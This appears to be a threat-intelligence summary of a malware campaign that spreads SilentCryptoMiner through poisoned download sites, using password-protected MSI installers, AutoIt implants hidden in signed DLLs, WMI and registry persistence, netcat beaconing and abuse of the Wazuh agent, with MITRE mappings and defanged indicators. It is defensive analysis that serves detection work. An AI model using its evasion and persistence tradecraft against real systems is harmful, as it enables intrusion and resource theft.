Scam Detection and Incident Management

A global campaign delivered a cryptominer via SEO-poisoned download sites, Telegram channels and YouTube links, using an MSI installer that unpacks an AutoIt-based A3X implant which persistently deploys an open-source miner. The attackers also abuse the Wazuh SIEM agent by enabling remote_commands and use signed DLL masquerading to bypass signature checks. #Wazuh #SilentCryptoMiner

Keypoints

Attackers used SEO-poisoned websites, Telegram channels and YouTube descriptions/comments to distribute password-protected ZIP archives containing malicious MSI installers.
The MSI requires a password (anti-sandbox measure), executes a VBScript CustomAction that runs BAT scripts to extract and escalate privileges, then forces a reboot for SYSTEM execution.
Malicious payloads are hidden inside legitimately signed DLLs: an AutoIt interpreter is used to execute a compiled A3X script embedded in the DLL signature, preserving the digital signature.
The A3X implant embeds additional files (via FileInstall) and installs them to obscured, attribute-protected directories, then enforces strict ACLs (icacls) to prevent removal.
Persistence is achieved via WMI event subscriptions, periodic execution of netcat (masquerading as StartMenuExperienceHost.exe) to sportjump[.]ru, repeated nun.bat executions, Image File Execution Options debugger/monitor abuse, and registry persistence.
Variants install Wazuh with remote_commands enabled to allow arbitrary remote execution and telemetry harvesting; the final payload injects SilentCryptoMiner into explorer.exe to mine Monero/Zephyr and manipulate processes/clipboard.
The implant performs environment checks (anti-AV, sandbox/debugger), may capture screenshots or install browser extensions, and exfiltrates host info to a Telegram bot controlled by the attackers.

MITRE Techniques

[T1608.006] Stage Capabilities: SEO Poisoning – used to place malicious download sites in search results (‘advertising their websites in Yandex search results’).
[T1608.001] Stage Capabilities: Upload Malware – attackers hosted malicious ZIP/MSI installers on cloned or GitHub/raw pages (‘download a ZIP file being falsely advertised as popular software’).
[T1204.001] User Execution: Malicious Link – users were led to malicious resources via YouTube descriptions, comments and Telegram links (‘links to their resources and instructions on how to launch the malware’).
[T1204.002] User Execution: Malicious File – distribution relied on users running password-protected MSI installers inside ZIP archives (‘Inside the archive is an MSI file and a TXT file with a password required for installation’).
[T1059.010] Command and Scripting Interpreter: AutoHotKey & AutoIT – attackers used a legitimate AutoIt interpreter to execute compiled A3X scripts embedded in DLLs (‘AutoIt interpreter has an interesting way of reading files…compiled scripts’).
[T1059.003] Command and Scripting Interpreter: Windows Command Shell – BAT files and “start” commands are used throughout the chain to extract and launch components (‘the BAT file extracts the encrypted RAR archive and runs the “start” command’).
[T1059.005] Command and Scripting Interpreter: Visual Basic – MSI CustomAction executed VBScript to start the BAT extraction chain (‘CustomAction field value of the MSI file is executed — this is effectively a VB script’).
[T1546.012] Event Triggered Execution: Image File Execution Options Injection – registry debugger/monitor keys are abused for persistence (‘abuses the registry keys “Image File Execution Options”, “Debugger” and “MonitorProcess”’).
[T1546.003] Event Triggered Execution: Windows Management Instrumentation Event Subscription – WMI filters and bindings are created to run commands on common events (‘creates filters which are activated by common events … executed using the __FilterToConsumerBinding class’).
[T1053.005] Scheduled Task/Job: Scheduled Task – periodic execution is scheduled via WMI polling frequencies to run netcat, nun.bat and other steps (‘Once every three minutes… once every five to ten minutes… once every fifteen minutes’).
[T1055] Process Injection – final payload injects the miner into explorer.exe memory (‘injects into a newly created explorer.exe process memory an open-source miner’).
[T1562.001] Impair Defenses: Disable or Modify Tools – installers and instructions advise disabling antivirus/Windows Defender (‘attackers recommend disabling any installed antivirus and Windows Defender beforehand’).
[T1497] Virtualization/Sandbox Evasion – the MSI password and process checks stop execution in sandboxed or analysis environments (‘the MSI file asks for the password… one of the first countermeasures against sandbox analysis’ and implant checks active processes’).
[T1027.009] Obfuscated Files or Information: Embedded Payloads – A3X and other files embed additional payloads and installers inside compiled scripts/DLL signatures (‘the interpreter stores the files for installation right inside the compiled script’).
[T1027.010] Obfuscated Files or Information: Command Obfuscation – scripts and compiled components use obfuscation and embedding to hide actions (‘malicious A3X implant… deobfuscated code shows security process name check’).
[T1036.008] Masquerading: Masquerade File Type – netcat is renamed StartMenuExperienceHost.exe and signed DLLs are used to appear legitimate (‘netcat utility masked as StartMenuExperienceHost.exe’ and payload hidden in legit dynamic library signature).
[T1564.001] Hide Artifacts: Hidden Files and Directories – installed directories are set system/hidden/read-only and use GUID-like names to hide in Explorer (‘directories containing the installed files have system, hidden and read-only attributes’ and use names like Classic.{GUID}).
[T1518.001] Software Discovery: Security Software Discovery – the implant collects installed AV/software info to decide on actions (‘collects… installed AV software’).
[T1033] System Owner/User Discovery – the implant gathers computer name and username (‘collects the following information: computer name, username’).
[T1082] System Information Discovery – OS version, architecture, CPU and GPU data are enumerated (‘OS version and architecture, CPU name, data about the GPU’).
[T1113] Screen Capture – some variants take screenshots of the desktop (‘some of the malware variants sending a screenshot of the user’s desktop’).
[T1496] Resource Hijacking – SilentCryptoMiner is used to mine cryptocurrencies on victims’ machines (‘injects… an open-source miner named SilentCryptoMiner’ to mine Monero/Zephyr).
[T1041] Exfiltration Over C2 Channel – collected host info is sent to a Telegram bot and C2 channels control the implant (‘sent to a special Telegram bot chat controlled by the attackers’ and netcat connects to sportjump[.]ru).

Indicators of Compromise

[Hashes] sample payloads and installers – b5b323679524d52e4c058b1a3dd8dee7, 4efa8ca01d7c566ff1b72f4ebf57cf2c, and 40+ other hashes listed in the report.
[Domains/URLs] distribution and C2 – sportjump[.]ru (C2/netcat), utorrent-client.github[.]io (malicious download), excel-ms.github[.]io/Windows/MS-Excel.zip, and multiple raw.githubusercontent and linktr[.]ee links.
[File names] installer and persistence files – StartMenuExperienceHost.exe (netcat masquerade), nun.bat, insta.bat, and MSI installers inside password-protected ZIPs.
[Paste/hosting links] staging and payload hosting – pastebin[.]com/raw/F87y7zJV, raw.githubusercontent[.]com/lidiyakamalova89/www/main/Ver.1.4.1.zip, and rentry[.]co/mi9fomgo/raw.

When focusing strictly on the technical procedure: the attackers deliver password-protected ZIP archives (containing an MSI and a TXT password) via SEO-poisoned sites, Telegram channels and YouTube links. The MSI enforces a manual password to bypass sandbox analysis, runs a VBScript CustomAction which launches BAT scripts that extract an encrypted archive; those BATs add an autorun BAT to escalate to SYSTEM for a single execution and trigger a reboot. After reboot, the autorun BAT extracts two DLLs and runs the AutoIt interpreter with the DLL as an argument; a compiled A3X script is embedded inside the signature of a legitimate signed DLL so the file remains verified while containing the malicious payload.

The A3X implant contains embedded files (via FileInstall calls) that it drops to obscured ProgramData paths, sets system/hidden/read-only attributes, and locks ACLs using icacls to prevent removal. Persistence is established with WMI event subscriptions (filters and __FilterToConsumerBinding) configured to run netcat (masquerading as StartMenuExperienceHost.exe) to sportjump[.]ru, execute nun.bat copies, and run the “start” command at regular intervals; the implant also abuses Image File Execution Options (Debugger/MonitorProcess) and directly launches persistence BATs. The implant performs environment checks for debuggers/AV, optionally captures screenshots or installs malicious browser extensions, and exfiltrates host details to a Telegram bot.

The final stage uses a second pair of DLLs (AutoIt + signed DLL with embedded A3X) to inject SilentCryptoMiner into a newly created explorer.exe process, pointing it to an attacker-controlled mining configuration (wallet, algorithm such as Monero/Zephyr, and stealth/kill lists). Variants also install the Wazuh agent with remote_commands enabled to allow remote command execution and telemetry harvesting, giving attackers an additional remote-control and persistence channel.

SHARE THIS STORY

WhatsApp X (Twitter)Telegram Bluesky Facebook LinkedIn Threads Email Print